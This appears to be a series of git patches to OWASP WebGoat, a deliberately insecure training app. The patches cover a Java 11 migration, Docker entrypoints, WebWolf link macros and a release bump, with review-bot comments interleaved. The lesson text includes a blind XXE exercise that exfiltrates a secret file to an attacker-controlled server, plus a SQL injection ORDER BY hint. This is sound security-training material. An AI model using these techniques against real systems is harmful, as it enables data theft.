--- a/webgoat-server/Dockerfile +++ b/webgoat-server/Dockerfile @@ -1,6 +1,6 @@ -FROM openjdk:8-jre-slim +FROM openjdk:11.0.1-jre-slim-stretch -ARG webgoat_version=v8.0.0.SNAPSHOT +ARG webgoat_version=v8.0.0-SNAPSHOT RUN \ apt-get update && apt-get install && \ diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile index 2cdb1e708..a91bcbbce 100644 --- a/webwolf/Dockerfile +++ b/webwolf/Dockerfile @@ -1,6 +1,6 @@ -FROM openjdk:8-jre-slim +FROM openjdk:11.0.1-jre-slim-stretch -ARG webwolf_version=v8.0.0.SNAPSHOT +ARG webwolf_version=v8.0.0-SNAPSHOT RUN \ apt-get update && apt-get install && \ From c3ee0b7662b5d28f2aa3c9748c4d481e72b8a4c1 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:24:39 +0100 Subject: [PATCH 22/28] Travis build should also use Java 11 --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 46865c92f..792680eb5 100644 --- a/.travis.yml +++ b/.travis.yml @@ -2,7 +2,7 @@ services: - docker language: java jdk: -- oraclejdk8 +- openjdk11 install: "/bin/true" script: - export BRANCH=$(if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then echo $TRAVIS_BRANCH; else echo $TRAVIS_PULL_REQUEST_BRANCH; fi) From 81d6e12ae142df2b7dbea92cdea9d123ecda7381 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:29:49 +0100 Subject: [PATCH 23/28] Spring devtools no longer work in combination with Spring and Java 11 --- webwolf/pom.xml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/webwolf/pom.xml b/webwolf/pom.xml index bb748e427..385a0fbc5 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -57,11 +57,13 @@ org.springframework.boot spring-boot-starter-data-jpa - - org.springframework.boot - spring-boot-devtools - true - + + + + + + + org.webjars From ed490a5ecfc7abbebe7329e0e680f0b607af9ba7 Mon Sep 17 00:00:00 2001 
From: Nanne Baars
Date: Wed, 16 Jan 2019 11:07:30 +0100
Subject: [PATCH 24/28] Fix for #545 Introduced new macro to make a clear distinction between /WebWolf with context root and without.
---
 .../webgoat/AsciiDoctorTemplateResolver.java | 2 ++
 .../owasp/webgoat/asciidoc/WebWolfMacro.java | 6 +++++-
 .../webgoat/asciidoc/WebWolfRootMacro.java | 20 +++++++++++++++++++
 .../resources/lessonPlans/en/XXE_blind.adoc | 6 +++---
 .../lessonPlans/en/XXE_blind_assignment.adoc | 2 +-
 5 files changed, 31 insertions(+), 5 deletions(-)
 create mode 100644 webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java b/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
index ecb80bd43..df4c11e0b 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
@@ -37,6 +37,7 @@ import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
 import org.owasp.webgoat.asciidoc.WebGoatVersionMacro;
 import org.owasp.webgoat.asciidoc.WebWolfMacro;
+import org.owasp.webgoat.asciidoc.WebWolfRootMacro;
 import org.owasp.webgoat.i18n.Language;
 import org.thymeleaf.TemplateProcessingParameters;
 import org.thymeleaf.resourceresolver.IResourceResolver;
@@ -87,6 +88,7 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
 StringWriter writer = new StringWriter();
 JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
 extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
 extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
 asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
index 7f81d63d1..2d655ce58 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
@@ -45,6 +45,10 @@ public class WebWolfMacro extends InlineMacroProcessor {
 HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
 String ip = request.getRemoteAddr();
 String hostname = StringUtils.hasText(ip) ? ip : host;
- return "http://" + hostname + ":" + port + "/WebWolf";
+ return "http://" + hostname + ":" + port + (includeWebWolfContext() ? "/WebWolf" : "");
+ }
+
+ protected boolean includeWebWolfContext() {
+ return true;
 }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java
new file mode 100644
index 000000000..b188c2a66
--- /dev/null
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java
@@ -0,0 +1,20 @@
+package org.owasp.webgoat.asciidoc;
+
+import java.util.Map;
+
+/**
+ * Usage in asciidoc:
+ *
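Review bot: The new protected hook `includeWebWolfContext()` has no Javadoc, and since it exists only to be overridden its contract belongs where subclass authors will look for it: `/** Whether the generated URL ends with the {@code /WebWolf} context path; subclasses return {@code false} to link to the WebWolf root instead. */`. The method whose return statement is changed here starts before the hunk, so the rest of the URL-building code is not visible in this view.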

+ * webWolfLink:here[] will display a href with here as text + * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing + */ +public class WebWolfRootMacro extends WebWolfMacro { + + public WebWolfRootMacro(String macroName, Map config) { + super(macroName, config); + } + + protected boolean includeWebWolfContext() { + return false; + } +} diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc index 72c9e4886..e8cfe8f71 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc @@ -5,7 +5,7 @@ Or the resource you are trying to read contains illegal XML character which caus Let's start with an example, in this case we reference an external DTD which we control on our own server. As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example -use this server to ping it using `webWolfLink:landing[noLink]` +use this server to ping it using `webWolfRootLink:landing[noLink]` How do we use this endpoint to verify whether we can perform XXE? @@ -14,7 +14,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi [source, subs="macros, specialcharacters"] ---- - + ---- Now submit the form change the xml using to: @@ -37,7 +37,7 @@ Now in WebWolf browse to 'Incoming requests' and you will see: ---- { "method" : "GET", - "path" : "/ping", + "path" : "/landing", "headers" : { "request" : { "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc index dd5ae4194..168d26426 100644 
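Review bot: The class Javadoc of WebWolfRootMacro is copied from WebWolfMacro and documents `webWolfLink:here[]` and `webWolfLink:landing[noLink]`, but this class is registered under the inline macro name `webWolfRootLink` in the AsciiDoctorTemplateResolver hunk of the same patch, so the only usage example a reader gets is for the other macro. The two example lines should read `webWolfRootLink:here[]` and `webWolfRootLink:landing[noLink]`, and the Javadoc should state that, unlike webWolfLink, the generated URL omits the `/WebWolf` context path. The `includeWebWolfContext()` method overrides the hook from WebWolfMacro and should carry `@Override` so a later signature drift in the parent is caught by the compiler rather than silently producing a non-overriding method.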
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc @@ -18,6 +18,6 @@ DTD. |`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt` |=== -Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]` +Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]` (NOTE: this endpoint is under your full control) Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson. \ No newline at end of file From dc5f9880af3e51b3bdd3196000bc4c95e517d2dc Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 17 Jan 2019 14:49:42 +0100 Subject: [PATCH 25/28] Full implementation of "Update Webgoat Dockerfile to use entrypoints and commands #523" based on the pull request of Nicklaus McClendon --- docker-compose.yml | 4 ++-- scripts/build-all.sh | 4 ++-- webgoat-server/Dockerfile | 5 ++++- webwolf/Dockerfile | 4 ++++ webwolf/start-webwolf.sh | 7 +++++++ 5 files changed, 19 insertions(+), 5 deletions(-) mode change 100644 => 100755 scripts/build-all.sh create mode 100755 webwolf/start-webwolf.sh diff --git a/docker-compose.yml b/docker-compose.yml index 27262211d..5712b6c43 100644 --- a/docker-compose.yml +++ b/docker-compose.yml 
@@ -8,11 +8,11 @@ services:
 - WEBWOLF_PORT=9090
 ports:
 - "8080:8080"
+ - "9001:9001"
 volumes:
 - .:/home/webgoat/.webgoat
- command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.port=8080 --server.address=0.0.0.0"
 webwolf:
 image: webgoat/webwolf
 ports:
 - "9090:9090"
- command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat"
+ command: --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat --server.address=0.0.0.0
\ No newline at end of file
diff --git a/scripts/build-all.sh b/scripts/build-all.sh
old mode 100644
new mode 100755
index 7835dff20..319854ac2
--- a/scripts/build-all.sh
+++ b/scripts/build-all.sh
@@ -7,13 +7,13 @@ SUCCESS=$?
 nc -zv 127.0.0.1 9090 2>/dev/null
 SUCCESS=${SUCCESS}$?
-if [[ "${SUCCESS}" -eq 00 ]] ; then
+if [[ "${SUCCESS}" -eq 0 ]] ; then
 echo "WebGoat and or WebWolf are still running, please stop them first otherwise unit tests might fail!"
 exit 127
 fi
-mvn clean install
+sh mvnw clean install
 if [[ "$?" -ne 0 ]] ; then
 exit y$?
 fi
diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile
index 74d0cd4ae..f1b910e52 100644
--- a/webgoat-server/Dockerfile
+++ b/webgoat-server/Dockerfile
@@ -10,4 +10,7 @@ USER webgoat
 RUN cd /home/webgoat/; mkdir -p .webgoat-${webgoat_version}
 COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
-EXPOSE 8080
\ No newline at end of file
+EXPOSE 8080
+
+ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar"]
+CMD ["--server.port=8080", "--server.address=0.0.0.0"]
\ No newline at end of file
diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile
index a91bcbbce..46598e803 100644
--- a/webwolf/Dockerfile
+++ b/webwolf/Dockerfile
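Review bot: The added `- "9001:9001"` publishes the webgoat service's HSQLDB listener on the host, while the only consumer visible here is webwolf, which reaches it over the compose network as `webgoat:9001` in the new jdbc URL and needs no host mapping for that. Keeping the database reachable only inside the compose network is the safer default, so I would drop the mapping (or use `expose: - "9001"` if documenting the port is the goal) unless host access is deliberately wanted. Separately, the new webwolf `command:` replaces the image's CMD entirely, so the `--server.port=9090` that the webwolf Dockerfile's CMD supplies is no longer passed; unless WebWolf's own configuration already defaults to 9090, the `9090:9090` mapping will point at nothing, which `command: --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat --server.port=9090 --server.address=0.0.0.0` avoids.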
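Review bot: The guard `[[ "${SUCCESS}" -eq 0 ]]` still fires only when both `nc` probes succeed: `SUCCESS` is the concatenation of two exit statuses, so "01" and "10" evaluate to 1 and 10 and skip the "still running" exit even though one server is up, contrary to the message text; `-eq 00` and `-eq 0` behave identically, so this edit did not change that. `if [[ "${SUCCESS}" == *0* ]] ; then` catches either port being in use. The unchanged `exit y$?` further down also passes a non-numeric status to `exit`, and because `$?` is reset by the surrounding `[[ ]]` test, the build status should be captured into a variable right after `sh mvnw clean install` and that variable passed to `exit`.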
@@ -8,5 +8,9 @@ RUN \
 USER webwolf
 COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
+COPY start-webwolf.sh /home/webwolf
 EXPOSE 9090
+
+ENTRYPOINT ["/home/webwolf/start-webwolf.sh"]
+CMD ["--server.port=9090", "--server.address=0.0.0.0"]
\ No newline at end of file
diff --git a/webwolf/start-webwolf.sh b/webwolf/start-webwolf.sh
new file mode 100755
index 000000000..31f0235e4
--- /dev/null
+++ b/webwolf/start-webwolf.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Script to start WebWolf, it needs a valid database connection from WebGoat so we wait 8 seconds before starting
+# WebWolf application
+
+echo " Waiting for database to be available..."
+sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar $@
\ No newline at end of file
From 9170dcb87f3aaaac46a6e776511b62d0714f2dab Mon Sep 17 00:00:00 2001
From: Shreyas Minocha
Date: Sun, 6 Jan 2019 20:43:42 +0530
Subject: [PATCH 26/28] Fix a grammatical error
---
 .../src/main/resources/i18n/WebGoatLabels.properties | 8 ++++----
 .../plugin/introduction/SqlInjectionLesson5aTest.java | 4 ++--
 2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties
index 409f69b6f..3b4a7ff59 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties
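Review bot: The last line of start-webwolf.sh forwards the arguments as unquoted `$@`, so any argument containing whitespace or glob characters is re-split before it reaches the JVM, and because the script is the container ENTRYPOINT, bash stays PID 1 and the JVM runs as a child whose stop signal is not forwarded. `exec java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar "$@"` fixes both. The fixed `sleep 8` is a timing guess rather than a readiness check, and the header comment presents it as waiting for the database; it would be more honest as `# Best-effort delay: assumes WebGoat's HSQLDB listener is up within 8 seconds; there is no readiness probe.`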
@@ -20,14 +20,14 @@ SqlStringInjectionHint9=Intercept the request and try to specify a different ord SqlStringInjectionHint10=Use for example "(case when (true) then hostname else id end)" in the order by and see what happens SqlStringInjectionHint11=Use for example "(case when (true) then hostname else id end)" in the order by and see what happens -sql-injection.5a.success=You have succeed: {0} +sql-injection.5a.success=You have succeeded: {0} sql-injection.5a.no.results=No results matched. Try Again. -sql-injection.5b.success=You have succeed: {0} +sql-injection.5b.success=You have succeeded: {0} sql-injection.5b.no.results=No results matched. Try Again. -sql-injection.6a.success=You have succeed: {0} +sql-injection.6a.success=You have succeeded: {0} sql-injection.6a.no.results=No results matched. Try Again. -sql-injection.6b.success=You have succeed: {0} +sql-injection.6b.success=You have succeeded: {0} sql-injection.6b.no.results=No results matched. Try Again. diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java index d180ca0af..16a6db791 100644 --- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java +++ b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java @@ -63,7 +63,7 @@ public class SqlInjectionLesson5aTest extends LessonTest { .andExpect(status().isOk()) .andExpect(jsonPath("lessonCompleted", is(true))) - .andExpect(jsonPath("$.feedback", containsString("You have succeed"))) + .andExpect(jsonPath("$.feedback", containsString("You have succeeded"))) .andExpect(jsonPath("$.output").doesNotExist()); } 
@@ -77,4 +77,4 @@ public class SqlInjectionLesson5aTest extends LessonTest { .andExpect(jsonPath("$.feedback", containsString(messages.getMessage("assignment.not.solved")))) .andExpect(jsonPath("$.output", is("malformed string: '1''"))); } -} \ No newline at end of file +} From b0e3a06b50c069b9035a41b32e8fb54f4af83be4 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 17 Jan 2019 16:33:55 +0100 Subject: [PATCH 27/28] Password reset lesson 5 not working #512 Added comment to not use OWASP ZAP --- .../resources/lessonPlans/en/PasswordReset_host_header.adoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc b/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc index 1daea2dc6..e3601c000 100644 --- a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc +++ b/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc @@ -14,5 +14,5 @@ The time out is necessary to restrict the attack window, having a link opens up Tom always resets his password immediately after receiving the email with the link. Try to reset the password of Tom (tom@webgoat-cloud.org) to your own choice and login as Tom with -that password. +that password. Note: it is not possible to use OWASP ZAP for this lesson. From 9be4361afc84f861ddd84b013ca0ace71bfd80ed Mon Sep 17 00:00:00 2001 
From: Nanne Baars Date: Fri, 18 Jan 2019 08:37:26 +0100 Subject: [PATCH 28/28] New release, updating pom.xml --- pom.xml | 2 +- webgoat-container/pom.xml | 2 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- webgoat-lessons/insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- webgoat-lessons/password-reset/pom.xml | 2 +- webgoat-lessons/pom.xml | 4 ++-- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- webgoat-lessons/xxe/pom.xml | 2 +- webgoat-server/pom.xml | 2 +- webwolf/pom.xml | 2 +- 25 files changed, 26 insertions(+), 26 deletions(-) diff --git a/pom.xml b/pom.xml index bf6e77a90..dba2c4440 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent pom - v8.0.0-SNAPSHOT + v8.0.0.M22 WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 2f766037a..347f7e6b1 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 0cdc9ef49..0f0a1085e 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml 
@@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index c1d0102c0..19d00f322 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index f4a321fd7..565a2e6c7 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index aa1d49872..51ab26b6c 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index 6c99401b6..b552ec05c 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index 2366e85d3..46562563c 100644 --- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index 2585104ca..0da8bb5d8 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml 
@@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index 4a2e3959b..a20459465 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index 23c24a5dd..fa45d71a5 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index 73e18fbaa..122f12cf5 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index 08de6cf6a..4e7e294f1 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index faf241a51..cbe489fca 100755 --- a/webgoat-lessons/insecure-login/pom.xml +++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index e1856384d..4850d85b6 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 
diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 7c2359247..12de5d3cb 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index 37c437ce9..b6c33f442 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index c6d9f8b75..bb44f17ea 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0-SNAPSHOT + v8.0.0.M22 org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index d2e50488c..ac6e19f53 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index 22411f819..e04800aee 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index 5e6d2ce7f..e12d7cf05 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml 
@@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index a268b0602..afffd26bf 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 6d69be448..b5870e3b1 100644 --- a/webgoat-lessons/xxe/pom.xml +++ b/webgoat-lessons/xxe/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml index 31a304e2f..1744d990c 100644 --- a/webgoat-server/pom.xml +++ b/webgoat-server/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webwolf/pom.xml b/webwolf/pom.xml index 385a0fbc5..4a2e40c0a 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22